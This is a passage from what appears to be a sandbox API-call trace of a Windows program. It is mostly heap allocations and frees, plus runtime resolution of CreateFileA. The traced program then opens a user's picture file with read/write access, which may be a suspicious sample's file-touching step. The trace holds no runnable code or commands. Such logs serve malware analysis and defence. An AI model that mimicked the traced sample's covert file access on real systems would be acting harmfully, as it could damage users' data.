returned 0x7af588 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0040.933] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.935] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce98 [0040.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.935] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0040.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.936] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42) returned 0x88e138 [0040.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", cchWideChar=66, lpMultiByteStr=0x88e138, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpUsedDefaultChar=0x0) returned 66 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.937] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\9repn4ayx.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x84) returned 0x7bbc00 [0040.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=66, lpWideCharStr=0x7bbc00, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp") returned 66 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.939] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.941] RtlAllocateHeap 